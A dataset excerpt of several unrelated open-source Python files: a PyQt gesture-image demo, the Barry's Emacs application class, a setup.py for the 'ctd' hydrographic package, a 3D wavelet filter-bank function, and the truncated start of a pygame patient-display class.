self.pixmapImagen = QPixmap(\"1.png\").scaled(112, 128, Qt.KeepAspectRatio,\n Qt.SmoothTransformation)\n \n self.labelImagen.setPixmap(self.pixmapImagen)\n self.labelImagen.setAlignment(Qt.AlignCenter)\n \n\n\n\n self.label_2 = QLabelClickable(self)\n self.label_2.setGeometry(180, 40, 120, 130)\n self.label_2.setToolTip(\"2nd Gesture\")\n self.label_2.setCursor(Qt.PointingHandCursor)\n self.label_2.setStyleSheet(\"QLabel {background-color: transparent; border: 1px \"\n 
\"; border-radius: 5px;}\")\n self.label_2.setStyleSheet(\"QLabel:hover {background-color: white;}\")\n\n self.pixmapImagen2 = QPixmap(\"2.png\").scaled(112, 128, Qt.KeepAspectRatio,\n Qt.SmoothTransformation)\n self.label_2.setPixmap(self.pixmapImagen2)\n self.label_2.setAlignment(Qt.AlignCenter)\n\n self.label_3 = QLabelClickable(self)\n self.label_3.setGeometry(50, 180, 120, 130)\n self.label_3.setToolTip(\"3rd Gesture\")\n self.label_3.setCursor(Qt.PointingHandCursor)\n self.label_3.setStyleSheet(\"QLabel {background-color: transparent; border: 1px \"\n \"; border-radius: 5px;}\")\n\n self.label_3.setStyleSheet(\"QLabel:hover {background-color: white;}\")\n self.pixmapImagen3 = QPixmap(\"3.png\").scaled(112, 128, Qt.KeepAspectRatio,\n Qt.SmoothTransformation)\n self.label_3.setPixmap(self.pixmapImagen3)\n self.label_3.setAlignment(Qt.AlignCenter)\n\n self.label_4 = QLabelClickable(self)\n self.label_4.setGeometry(180, 180, 120, 130)\n self.label_4.setToolTip(\"3rd Gesture\")\n self.label_4.setCursor(Qt.PointingHandCursor)\n self.label_4.setStyleSheet(\"QLabel {background-color: transparent; border: 1px \"\n \"; border-radius: 5px;}\")\n self.label_4.setStyleSheet(\"QLabel:hover {background-color: white;}\")\n self.pixmapImagen4 = QPixmap(\"4.png\").scaled(112, 128, Qt.KeepAspectRatio,\n Qt.SmoothTransformation)\n self.label_4.setPixmap(self.pixmapImagen4)\n self.label_4.setAlignment(Qt.AlignCenter)\n\n\n\n\n\n\n\n\n\n # ===================== EVENTO QLABEL ======================\n\n # Llamar función al hacer clic o doble clic sobre el label\n self.labelImagen.clicked.connect(self.Clic)\n self.label_2.clicked.connect(self.secondClick)\n self.label_3.clicked.connect(self.thirdClick)\n self.label_4.clicked.connect(self.fourthClick)\n\n # ======================= FUNCIONES ============================\n\n def Clic(self):\n QMessageBox.information(self, \"1st Gesture\",\"1st Gesture was clicked\")\n def secondClick(self):\n QMessageBox.information(self, \"2nd Gesture\",\"2nd Gesture was clicked\")\n def thirdClick(self):\n QMessageBox.information(self, \"3rd Gesture\",\"3rd Gesture was clicked\")\n def fourthClick(self):\n QMessageBox.information(self, \"4th Gesture\",\"4th Gesture was clicked\") \n def close(self):\n QApplication.quit()\n\n# ================================================================\n\nif __name__ == '__main__':\n \n import sys\n \n aplicacion = QApplication(sys.argv)\n \n ventana = labelClickable()\n ventana.show()\n \n sys.exit(aplicacion.exec_())\n","sub_path":"src/gui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"562144238","text":"'''\n ====================================================================\n Copyright (c) 2003-2016 Barry A Scott. All rights reserved.\n\n This software is licensed as described in the file LICENSE.txt,\n which you should have received as part of this distribution.\n\n ====================================================================\n\n be_app.py\n\n Based on code from pysvn WorkBench\n\n'''\nimport sys\nimport os\nimport stat\nimport types\nimport logging\nimport tempfile\nimport threading\nimport inspect\nimport gettext\nimport queue\n\nfrom PyQt6 import QtWidgets\nfrom PyQt6 import QtGui\nfrom PyQt6 import QtCore\n\nimport be_main_window\nimport be_platform_specific\nimport be_preferences\nimport be_exceptions\nimport be_debug\n\nqt_event_type_names = {}\nfor name in dir(QtCore.QEvent.Type):\n value = getattr( QtCore.QEvent.Type, name )\n if isinstance( value, int ):\n qt_event_type_names[ int(value) ] = name\n\nclass BemacsApp(QtWidgets.QApplication, be_debug.EmacsDebugMixin):\n MarshallToGuiThreadSignal = QtCore.pyqtSignal( name='MarshallToGuiThread' )\n\n def __init__( self, args ):\n be_debug.EmacsDebugMixin.__init__( self )\n\n self.may_quit = False\n\n self.args = args\n self.opt_name = None\n self.release_waiting_client_reply = None\n\n self.startup_dir = os.getcwd()\n\n be_platform_specific.setupPlatform( args[0] )\n\n # on the Mac the app's cwd is the resource folder\n if sys.platform == 'darwin':\n if 'PWD' in os.environ:\n os.chdir( os.environ['PWD'] )\n else:\n os.chdir( os.environ['HOME'] )\n\n self.__debug_noredirect = False\n self.__debug = True\n self.__mock_editor = False\n self.__log_stdout = False\n\n self.__callback_queue = queue.Queue()\n\n while len(args) > 1:\n arg = args[ 1 ]\n if arg.startswith( '-psn_' ):\n del args[ 1 ]\n\n elif arg.startswith( '--name=' ):\n self.opt_name = arg[len('--name='):]\n del args[ 1 ]\n\n elif arg == '--noredirect':\n self.__debug_noredirect = True\n del args[ 1 ]\n\n elif arg == '--log-stdout':\n self.__log_stdout = True\n del args[ 1 ]\n\n elif arg == '--debug' and len(args) > 2:\n self.__debug = True\n be_debug.setDebug( args[2] )\n del args[ 1 ]\n del args[ 1 ]\n\n elif arg == '--mock-editor':\n self.__mock_editor = True\n del args[ 1 ]\n\n elif arg == '--start-dir' and len(args) > 2:\n os.chdir( args[2] )\n del args[1]\n del args[1]\n\n elif arg == '--':\n break\n\n else:\n break\n\n self.__call_gui_result = None\n self.__call_gui_result_event = threading.Event()\n\n self.editor = None\n\n self.main_thread = threading.currentThread()\n if self.__mock_editor:\n self.editor_thread = None\n self.command_line_thread = None\n self.editor = MockEditor( self )\n\n else:\n self.editor_thread = threading.Thread( name='Editor', target=self.__runEditor )\n self.command_line_thread = threading.Thread( name='CommandLine', target=self.__runCommandLineHandler )\n\n self.progress_format = None\n self.progress_values = {}\n\n locale_path = be_platform_specific.getLocalePath( self )\n self.translation = gettext.translation(\n 'bemacs',\n str(locale_path),\n # language defaults\n fallback=True )\n\n import builtins\n # T_( 'non plural' )\n builtins.__dict__['T_'] = self.translation.gettext\n # S_( 'singular', 'plural', n )\n builtins.__dict__['S_'] = self.translation.ngettext\n # U_( 'static string' )\n builtins.__dict__['U_'] = lambda s: s\n\n # Debug settings\n self.__last_client_error = []\n\n self.setupLogging()\n\n self.log.info( 'startup_dir %s' % (self.startup_dir,) )\n self.log.info( 'locale_path %s' % 
(locale_path,) )\n self.log.info( 'find %r' % (gettext.find( 'bemacs', str(locale_path) ),) )\n self.log.info( 'info %r' % (self.translation.info(),) )\n self.log.info( T_(\"Barry's Emacs\") )\n\n self.log.info( 'Application dir %s' % (be_platform_specific.getAppDir(),) )\n self.log.info( 'emacs_user %s' % (be_platform_specific.getUserDir(),) )\n self.log.info( 'emacs_library %s' % (be_platform_specific.getLibraryDir(),) )\n self.log.info( 'emacs_doc %s' % (be_platform_specific.getDocDir(),) )\n\n self.user_window_preference_is_dark_mode = self.palette().text().color().lightnessF() > self.palette().window().color().lightnessF()\n\n self.prefs_mgr = be_preferences.BemacsPreferenceManager(\n self,\n be_platform_specific.getPreferencesFilename(),\n be_platform_specific.getSessionFilename() )\n\n self.main_window = None\n self.log.info( 'Qt argv[0] %r' % (sys.argv[0],) )\n self.log.info( 'Qt libraryPaths %r' % (QtWidgets.QApplication.libraryPaths(),) )\n\n # init QApplication now that we have the plugin dir setup\n QtWidgets.QApplication.__init__( self, [sys.argv[0]] )\n\n screen = self.primaryScreen()\n self.log.info( 'primary screen availableGeometry %r' % (screen.availableGeometry(),) )\n self.log.info( 'primary screen availableSize %r' % (screen.availableSize(),) )\n self.log.info( 'primary screen devicePixelRatio %r' % (screen.devicePixelRatio(),) )\n\n self.setDesktopFileName( '/usr/share/applications/org.barrys-emacs.editor.desktop' )\n self.log.info( 'desktopFileName %r' % (self.desktopFileName(),) )\n\n prefs = self.getPrefs()\n self.log.info( 'Is Dark mode %r, theme %r' %\n (self.user_window_preference_is_dark_mode, prefs.window.theme.name) )\n\n if not self.user_window_preference_is_dark_mode and prefs.window.theme.name == 'Dark':\n self.log.info( 'Setting dark palette' )\n self.setDarkPalette()\n\n elif self.user_window_preference_is_dark_mode:\n self.log.info( 'Setting dark mode styles' )\n self.setStyleSheet( 'QToolButton { border: none; }'\n 'QToolButton:checked { background: darkblue }' )\n\n self.main_window = be_main_window.BemacsMainWindow( self )\n\n self.MarshallToGuiThreadSignal.connect( self.handleMarshallToGuiThread )\n\n #QQQ self.setFallbackSessionManagementEnabled( False )\n\n self.saveStateRequest.connect( self.saveStateHandler )\n self.commitDataRequest.connect( self.commitDataHandler )\n\n def setDarkPalette( self ):\n # thanks to https://gist.github.com/QuantumCD/6245215\n self.setStyle( QtWidgets.QStyleFactory.create( \"Fusion\" ) )\n self.dark_palette = QtGui.QPalette()\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Window, QtGui.QColor( 53,53,53 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.WindowText, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Base, QtGui.QColor( 25,25,25 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.AlternateBase, QtGui.QColor( 53,53,53 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.ToolTipBase, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.ToolTipText, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Text, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Button, QtGui.QColor( 53,53,53 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.ButtonText, QtCore.Qt.GlobalColor.white )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.BrightText, QtCore.Qt.GlobalColor.red )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Link, 
QtGui.QColor( 42, 130, 218 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.Highlight, QtGui.QColor( 42, 130, 218 ) )\n self.dark_palette.setColor( QtGui.QPalette.ColorRole.HighlightedText, QtCore.Qt.GlobalColor.black )\n\n self.setPalette( self.dark_palette )\n\n self.setStyleSheet( 'QToolTip { color: white; background-color: black; border: 1px solid #1e1e1e; }'\n 'QToolButton { border: none; }'\n 'QToolButton:checked { background: darkblue }' )\n\n # called at start up to find the setting for session management\n def saveStateHandler( self, mgr ):\n self.log.info( 'Session Manager probing save state' )\n\n def commitDataHandler( self, mgr ):\n self.log.info( 'Session Manager calls commitDataHandler' )\n if self.editor.guiCheckIfModifiedFilesExist():\n if mgr.allowsInteraction():\n if not self.guiYesNoDialog( False, 'Modified files exist', 'Do you really want to quit Emacs?'):\n self.log.info( 'User wants session manager to cancel' )\n mgr.cancel()\n\n else:\n self.log.info( 'Modified files exist - telling session manager to cancel' )\n mgr.cancel()\n\n def getFrameGeometry( self ):\n return self.prefs_mgr.getFrameGeometry()\n\n def setFrameGeometry( self, geometry ):\n self.prefs_mgr.setFrameGeometry( geometry )\n\n def getPrefs( self ):\n return self.prefs_mgr.getPrefs()\n\n def event( self, event ):\n self._debugApp( 'BemacsApp.event() type() %r %s' %\n (event.type(), qt_event_type_names.get( event.type(), '-unknown-' )) )\n\n if event.type() == QtCore.QEvent.Type.FileOpen:\n self.guiClientCommandHandler( [os.getcwd(), 'emacs'] + [event.file()] )\n return True\n\n return QtWidgets.QApplication.event( self, event )\n\n def eventWrapper( self, function ):\n return EventScheduling( self, function )\n\n def isMainThread( self ):\n 'return true if the caller is running on the main thread'\n return self.main_thread is threading.currentThread()\n\n def setupLogging( self ):\n self.log = logging.getLogger( 'bemacs' )\n\n if self.__debug:\n self.log.setLevel( logging.DEBUG )\n else:\n self.log.setLevel( logging.INFO )\n\n if self.__log_stdout:\n handler = StdoutLogHandler()\n formatter = logging.Formatter( '%(asctime)s %(levelname)s %(message)s' )\n handler.setFormatter( formatter )\n self.log.addHandler( handler )\n\n else:\n log_filename = be_platform_specific.getLogFilename()\n # keep 10 logs of 100K each\n handler = RotatingFileHandler( log_filename, 'a', 100*1024, 10 )\n formatter = logging.Formatter( '%(asctime)s %(levelname)s %(message)s' )\n handler.setFormatter( formatter )\n self.log.addHandler( handler )\n\n self.log.info( T_(\"Barry's Emacs starting\") )\n\n self.log.debug( 'debug enabled' )\n\n def log_client_error( self, e, title='Error' ):\n # must run on the main thread\n if not self.isMainThread():\n self.marshallToGuiThread( self.log_client_error, (e, title) )\n return\n\n self.__last_client_error = []\n for message, _ in e.args[1]:\n self.__last_client_error.append( message )\n self.log.error( message )\n\n message = '\\n'.join( self.__last_client_error )\n QtWidgets.QMessageBox.critical( self, title, message ).exec()\n\n def log_error( self, e, title='Error' ):\n # must run on the main thread\n if not self.isMainThread():\n self.marshallToGuiThread( self.log_error, (e, title) )\n return\n\n message = str( e )\n self.log.error( message )\n\n QtWidgets.QMessageBox.critical( self, title, message ).exec()\n\n def setStatus( self, all_values ):\n if self.main_window is not None:\n self.main_window.setStatus( all_values )\n\n def refreshFrame( self ):\n 
self.main_window.refreshFrame()\n\n def writePreferences( self ):\n self.prefs_mgr.writePreferences()\n\n # notify app that the emacs panel is ready for use\n def onEmacsPanelReady( self ):\n self._debugApp( 'BemacsApp.onEmacsPanelReady()' )\n self.marshallToGuiThread( self.__initEditorThread, () )\n\n def guiHasFocus( self ):\n if self.editor is not None:\n self.editor.guiHasFocus()\n\n def onCloseEditor( self ):\n self.log.debug( 'onCloseEditor()' )\n self.editor.guiCloseWindow()\n\n def callGuiFunction( self, function, args ):\n self.__call_gui_result_event.clear()\n self.marshallToGuiThread( self.executeCallGuiFunction, (function, args) )\n self.__call_gui_result_event.wait()\n return self.__call_gui_result\n\n def executeCallGuiFunction( self, function, args ):\n self.__call_gui_result = function( *args )\n self.__call_gui_result_event.set()\n\n def marshallToGuiThread( self, function, args ):\n m = MarshalledCall( function, args )\n self._debugCallback( 'marshallToGuiThread %r sent' % (m,) )\n self.__callback_queue.put( m )\n self.MarshallToGuiThreadSignal.emit()\n\n def handleMarshallToGuiThread( self ):\n m = self.__callback_queue.get( block=False )\n self._debugCallback( 'handleMarshallToGuiThread %r start' % (m,) )\n\n try:\n m.dispatch()\n\n except:\n self.log.exception( 'handleMarshallToGuiThread\\n' )\n\n self._debugCallback( 'handleMarshallToGuiThread %r done' % (m,) )\n\n def debugShowCallers( self, depth ):\n if not self.__debug:\n return\n\n stack = inspect.stack()\n for index in range( 1, depth+1 ):\n if index >= len(stack):\n break\n\n caller = stack[ index ]\n filename = os.path.basename( caller[1] )\n self._debugApp( 'File: %s:%d, Function: %s' % (filename, caller[2], caller[3]) )\n del caller\n\n del stack\n\n def guiReportException( self, body, title ):\n QtWidgets.QMessageBox.critical( self.main_window, title, body )\n\n #--------------------------------------------------------------------------------\n def __initCommandLineThread( self ):\n self._debugApp( 'BemacsApp.__initCommandLineThread()' )\n if self.__mock_editor:\n return\n\n self.command_line_thread.daemon = True\n self.command_line_thread.start()\n\n def __runCommandLineHandler( self ):\n try:\n if sys.platform.startswith( 'win' ):\n import be_command_line_handler_windows\n handler = be_command_line_handler_windows.CommandLineHandlerWindows( self, self.opt_name )\n\n else:\n # unix and OS X\n import be_command_line_handler_posix\n handler = be_command_line_handler_posix.CommandLineHandlerPosix( self, self.opt_name )\n\n handler.processCommandLines()\n\n except Exception as e:\n self.log.exception( 'command line exception' )\n\n self.marshallToGuiThread( self.guiReportException, (str(e), 'Command line Exception') )\n\n def releaseWaitingClient( self, reply ):\n self.release_waiting_client_reply = reply\n\n def handleClientCommand( self, all_client_args ):\n self.marshallToGuiThread( self.guiClientCommandHandler, (all_client_args,) )\n\n def guiClientCommandHandler( self, all_client_args ):\n command_directory = all_client_args[0]\n command_args = all_client_args[1:]\n\n self.main_window.raise_()\n self.main_window.activateWindow()\n\n self._debugApp( 'guiClientCommandHandler: command_directory %r' % (command_directory,) )\n self._debugApp( 'guiClientCommandHandler: command_args %r' % (command_args,) )\n self.editor.guiClientCommand( command_directory, command_args )\n\n #--------------------------------------------------------------------------------\n def __initEditorThread( self ):\n self._debugApp( 
'BemacsApp.__initEditorThread()' )\n if self.__mock_editor:\n return\n\n self.editor_thread.daemon = True\n self.editor_thread.start()\n\n def __runEditor( self ):\n import be_editor\n\n try:\n self._debugApp( 'BemacsApp.__runEditor()' )\n\n self.editor = be_editor.BEmacs( self )\n self.editor.initEmacsProfile( self.main_window.emacs_panel )\n\n # now that emacs has init'ed and processed any command line\n # the command line handler can be started\n self.marshallToGuiThread( self.__initCommandLineThread, () )\n\n # stay in processKeys until editor quits\n while True:\n rc = self.editor.processKeys()\n self._debugApp( 'processKeys rc %r' % (rc,) )\n\n mod = self.editor.modifiedFilesExist()\n if not mod:\n break\n\n can_exit = self.callGuiFunction( self.guiYesNoDialog, (False, 'Modified files exist', 'Do you really want to quit Emacs?') )\n if can_exit:\n break\n\n except Exception as e:\n self.log.exception( 'editor exception' )\n\n self.callGuiFunction( self.guiReportException, (str(e), 'Editor Exception') )\n\n self.marshallToGuiThread( self.quit, () )\n\n def guiYesNoDialog( self, default_to_yes, title, message ):\n #qqq# What is default for?\n if default_to_yes:\n default_button = QtWidgets.QMessageBox.StandardButton.Yes\n else:\n default_button = QtWidgets.QMessageBox.StandardButton.No\n\n rc = QtWidgets.QMessageBox.question( self.main_window, title, message, defaultButton=default_button )\n return rc == QtWidgets.QMessageBox.StandardButton.Yes\n\n def guiOpenFileDialog( self, title, existing_file, file_filter, detailed, folder, filename ):\n self._debugUiHook( 'guiOpenFileDialog( title=%r, existing_file=%r, file_filter=%r, detailed=%r, folder=%r, filename=%r )' % (title, existing_file, file_filter, detailed, folder, filename) )\n open_file = QtWidgets.QFileDialog( self.main_window, QtCore.Qt.WindowType.Dialog )\n open_file.setWindowTitle( title )\n\n open_file.setDefaultSuffix( '' )\n\n if existing_file:\n open_file.setFileMode( open_file.FileMode.ExistingFile )\n open_file.setAcceptMode( open_file.AcceptMode.AcceptOpen )\n\n else:\n open_file.setFileMode( open_file.FileMode.AnyFile )\n open_file.setAcceptMode( open_file.AcceptMode.AcceptSave )\n\n if detailed:\n open_file.setViewMode( open_file.ViewMode.Detail )\n\n else:\n open_file.setViewMode( open_file.ViewMode.List )\n\n if file_filter == '':\n open_file.setNameFilters( ['All (*)'] )\n\n else:\n open_file.setNameFilters( file_filter.split( '\\n' ) )\n\n if folder != '':\n open_file.setDirectory( folder )\n\n if filename != '':\n open_file.selectFile( filename )\n\n if open_file.exec():\n self._debugUiHook( 'open_file.exec()' )\n return open_file.selectedFiles()[0]\n\n return None\n\n def quit( self ):\n self._debugApp( 'quit()' )\n self.may_quit = True\n self.main_window.close()\n\n def setWindowTitle( self, title_suffix ):\n if self.opt_name is None:\n title = \"Barry's Emacs - %s\" % (title_suffix,)\n else:\n title = \"%s - %s\" % (self.opt_name, title_suffix)\n\n self.main_window.setWindowTitle( title )\n\n#--------------------------------------------------------------------------------\n#\n# RotatingFileHandler - based on python lib class\n#\n#--------------------------------------------------------------------------------\nclass RotatingFileHandler(logging.FileHandler):\n def __init__(self, filename, mode=\"a\", maxBytes=0, backupCount=0):\n \"\"\"\n Open the specified file and use it as the stream for logging.\n\n By default, the file grows indefinitely. 
You can specify particular\n values of maxBytes and backupCount to allow the file to rollover at\n a predetermined size.\n\n Rollover occurs whenever the current log file is nearly maxBytes in\n length. If backupCount is >= 1, the system will successively create\n new files with the same pathname as the base file, but with extensions\n \".1\", \".2\" etc. appended to it. For example, with a backupCount of 5\n and a base file name of \"app.log\", you would get \"app.log\",\n \"app.log.1\", \"app.log.2\", ... through to \"app.log.5\". The file being\n written to is always \"app.log\" - when it gets filled up, it is closed\n and renamed to \"app.log.1\", and if files \"app.log.1\", \"app.log.2\" etc.\n exist, then they are renamed to \"app.log.2\", \"app.log.3\" etc.\n respectively.\n\n If maxBytes is zero, rollover never occurs.\n \"\"\"\n logging.FileHandler.__init__(self, str(filename), mode)\n self.maxBytes = maxBytes\n self.backupCount = backupCount\n if maxBytes > 0:\n self.mode = \"a\"\n\n def doRollover(self):\n \"\"\"\n Do a rollover, as described in __init__().\n \"\"\"\n\n self.stream.close()\n if self.backupCount > 0:\n prefix, suffix = os.path.splitext( self.baseFilename )\n for i in range(self.backupCount - 1, 0, -1):\n sfn = \"%s.%d%s\" % (prefix, i, suffix)\n dfn = \"%s.%d%s\" % (prefix, i+1, suffix)\n if os.path.exists(sfn):\n #print( \"%s -> %s\" % (sfn, dfn) )\n if os.path.exists(dfn):\n os.remove(dfn)\n os.rename(sfn, dfn)\n dfn = self.baseFilename + \".1\"\n if os.path.exists(dfn):\n os.remove(dfn)\n os.rename(self.baseFilename, dfn)\n #print( \"%s -> %s\" % (self.baseFilename, dfn) )\n self.stream = open(self.baseFilename, \"w\")\n\n def emit(self, record):\n \"\"\"\n Emit a record.\n\n Output the record to the file, catering for rollover as described\n in setRollover().\n \"\"\"\n if self.maxBytes > 0: # are we rolling over?\n msg = \"%s\\n\" % self.format(record)\n try:\n self.stream.seek(0, 2) #due to non-posix-compliant Windows feature\n if self.stream.tell() + len(msg) >= self.maxBytes:\n self.doRollover()\n\n except ValueError:\n # on Windows we get \"ValueError: I/O operation on closed file\"\n # when a second copy of workbench is run\n self.doRollover()\n\n logging.FileHandler.emit(self, record)\n\n # force each record out on its own\n def shouldFlush( self ):\n return True\n\nclass StdoutLogHandler(logging.Handler):\n def __init__( self ):\n logging.Handler.__init__( self )\n\n def emit( self, record ):\n try:\n msg = self.format( record ) + '\\n'\n\n sys.stdout.write( msg )\n sys.stdout.flush()\n\n except:\n self.handleError( record )\n\nclass MockEditor(be_debug.EmacsDebugMixin):\n def __init__( self, app ):\n be_debug.EmacsDebugMixin.__init__( self )\n\n be_debug._debug_editor = True\n\n self.app = app\n self.count = 0\n\n self.vert_scroll = []\n self.horz_scroll = []\n\n self.log = self\n\n def debug( self, msg ):\n self.__writeToScreen( 3, 'debug: %s' % (msg,) )\n\n def __writeToScreen( self, line, text ):\n p = self.app.main_window.emacs_panel\n\n attr = [0] * len(text)\n\n new = (text, attr)\n\n p.termUpdateBegin()\n p.termUpdateLine( None, new, line )\n p.termTopos( line, 10 )\n all_state = {'readonly': True\n ,'overstrike': False\n ,'eol': 'LF'\n ,'line': 4199\n ,'column': 9\n ,'case-fold-search': True\n ,'replace-case': True\n ,'display-non-printing-characters': False\n ,'wrap-long-lines': False\n }\n p.termUpdateEnd( all_state, self.vert_scroll, self.horz_scroll )\n\n def guiCloseWindow( self, *args, **kwds ):\n self.app.marshallToGuiThread( 
self.app.quit, () )\n\n def guiGeometryChange( self, *args, **kwds ):\n pass\n\n def guiHasFocus( self, *args, **kwds ):\n pass\n\n def guiEventChar( self, char, shift ):\n print( 'guiEventChar( %r, %r )' % (char, shift) )\n self.count += 1\n\n self.__writeToScreen( 1, ' %6d guiEventChar( %r, %r ) called' % (self.count, char, shift) )\n\n if char == 'c':\n self.app.marshallToGuiThread( self.uiHookEditCopy, ('edit-copy', 'quick brown fox') )\n\n elif char == 'v':\n self.app.marshallToGuiThread( self.uiHookEditPaste, ('edit-paste',) )\n\n def guiEventMouse( self, *args, **kwds ):\n self.count += 1\n\n self.__writeToScreen( 2, ' %6d guiEventMouse called' % (self.count,) )\n\n # Only used in __mock_editor mode\n def uiHookEditCopy( self, cmd, text ):\n self.app.clipboard().setText( text )\n\n # Only used in __mock_editor mode\n def uiHookEditPaste( self, cmd, use_primary=False ):\n self._debugEditor( 'uiHookEditPaste use_primary=%r' % (use_primary,) )\n\n if use_primary:\n text = self.app.clipboard().text( mode=QtGui.QClipboard.Mode.Selection )\n\n else:\n text = self.app.clipboard().text( mode=QtGui.QClipboard.Mode.Clipboard )\n\n text = text.replace( '\\r\\n', '\\n' ).replace( '\\r', '\\n' )\n\n self._debugEditor( 'uiHookEditPaste text=%r' % (text,) )\n\nclass MarshalledCall:\n def __init__( self, function, args ):\n self.function = function\n self.args = args\n\n def dispatch( self ):\n self.function( *self.args )\n\n def __repr__( self ):\n return 'MarshalledCall: fn=%s nargs=%d' % (self.function.__name__, len(self.args))\n","sub_path":"Editor/PyQt6/be_app.py","file_name":"be_app.py","file_ext":"py","file_size_in_byte":26370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"523685521","text":"from __future__ import absolute_import, division, print_function\n\nimport os\n\nfrom setuptools import setup\n\nimport versioneer\n\nrootpath = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n return open(os.path.join(rootpath, *parts), 'r').read()\n\n\nlong_description = '{}\\n{}'.format(read('README.rst'), read('CHANGES.txt'))\nLICENSE = read('LICENSE.txt')\n\n\nwith open('requirements.txt') as f:\n require = f.readlines()\ninstall_requires = [r.strip() for r in require]\n\nsetup(\n name='ctd',\n version=versioneer.get_version(),\n license=LICENSE,\n long_description=long_description,\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Education',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Education',\n ],\n description='Tools to load hydrographic data as DataFrames',\n author='Filipe Fernandes',\n author_email='ocefpaf@gmail.com',\n maintainer='Filipe Fernandes',\n maintainer_email='ocefpaf@gmail.com',\n url='https://github.com/pyoceans/python-ctd',\n download_url='http://pypi.python.org/pypi/ctd',\n platforms='any',\n keywords=['oceanography', 'data analysis', 'DataFrame'],\n install_requires=install_requires,\n tests_require=['pytest'],\n packages=['ctd'],\n cmdclass=versioneer.get_cmdclass(),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"575029801","text":"from ornlm import upfir\nimport numpy as np\nfrom cshift3D import cshift3D\ndef permutationInverse(perm):\n inverse = [0] * len(perm)\n for i, p in enumerate(perm):\n inverse[p] = i\n return inverse\n\ndef sfb3D_A(lo, hi, sf, d):\n lpf=sf[:, 0]\n hpf=sf[:, 1]\n # permute dimensions of lo and hi so that dimension d is first.\n p=[(i+d)%3 for i in xrange(3)]\n lo=lo.transpose(p)\n hi=hi.transpose(p)\n\n (N1, N2, N3)=lo.shape\n N=2*N1\n L=sf.shape[0]\n y=np.zeros((N+L-2, N2, N3))\n for k in xrange(N3):\n y[:, :, k] = (np.array(upfir(lo[:, :, k], lpf)) + \n np.array(upfir(hi[:, :, k], hpf)))\n y[:(L-2), :, :] = y[:(L-2), :, :] + y[N:(N+L-2), :, :]\n y=y[:N, :, :]\n y=cshift3D(y, 1-L/2, 0);\n #permute dimensions of y (inverse permutation)\n q=permutationInverse(p)\n y=y.transpose(q);\n return y\n\ndef sfb3D(lo, hi, sf1, sf2=None, sf3=None):\n if sf2==None:\n sf2=sf1\n if sf3==None:\n sf3=sf1\n LLL=lo;\n LLH=hi[0];\n LHL=hi[1];\n LHH=hi[2];\n HLL=hi[3];\n HLH=hi[4];\n HHL=hi[5];\n HHH=hi[6];\n # filter along dimension 2\n LL=sfb3D_A(LLL, LLH, sf3, 2);\n LH=sfb3D_A(LHL, LHH, sf3, 2);\n HL=sfb3D_A(HLL, HLH, sf3, 2);\n HH=sfb3D_A(HHL, HHH, sf3, 2);\n # filter along dimension 1\n L=sfb3D_A(LL, LH, sf2, 1);\n H=sfb3D_A(HL, HH, sf2, 1);\n # filter along dimension 0\n y=sfb3D_A(L, H, sf1, 0);\n return y\n\n\n","sub_path":"dev/denoise/ornlm/wavelet/sfb3D.py","file_name":"sfb3D.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"242381228","text":"import pygame\nfrom riglib.stereo_opengl.window import WindowDispl2D\nfrom riglib.stereo_opengl.primitives import Circle, Sector, Line\nfrom config import config\nimport numpy as np\nimport os\nfrom riglib.stereo_opengl.models import Group\n\nclass PatientDisp(WindowDispl2D):\n\n def __init__(self, *args, **kwargs):\n # Hard code window size -- full size of monitor for patient screen and exp display\n self.exp_window_size = (500, 200) #Size of window to display to the experimenter\n self.pat_window_size = (1000, 560) #Size of window to display to the patient\n self.txt_pos = tuple(1/4.*np.array(self.pat_window_size))\n self.extended_window_size = tuple((self.exp_window_size[0] + self.pat_window_size[0],\n np.max([self.exp_window_size[1], self.pat_window_size[1]])))\n\n self.exp_wind_coord = (0, 0)\n self.pat_wind_coord = (self.exp_window_size[0], 0)\n\n self.pat_background_color = (100, 100, 100, 1)\n self.init_pat_display_done = 0\n self.seq = kwargs.pop('seq', None)\n self.seq_params = kwargs.pop('sequ_params', None)\n\n\n super(PatientDisp, self).__init__(*args, **kwargs)\n\n def screen_init(self):\n\n os.environ['SDL_VIDEO_WINDOW_POS'] = config.display_start_pos\n os.environ['SDL_VIDEO_X11_WMCLASS'] = \"iBMI\"\n pygame.init()\n self.font = pygame.font.Font(None, 36)\n self.clock = pygame.time.Clock()\n\n flags = pygame.NOFRAME\n self._set_workspace_size()\n\n self.workspace_x_len = self.workspace_top_right[0] - self.workspace_bottom_left[0]\n self.workspace_y_len = self.workspace_top_right[1] - self.workspace_bottom_left[1]\n\n self.display_border = 10\n \n self.exp_size = np.array(self.exp_window_size, dtype=np.float64)\n self.screen = pygame.display.set_mode(self.extended_window_size, flags)\n\n self.screen_background_exp = pygame.Surface(self.exp_window_size).convert()\n self.screen_background_pat = pygame.Surface(self.pat_window_size).convert()\n \n 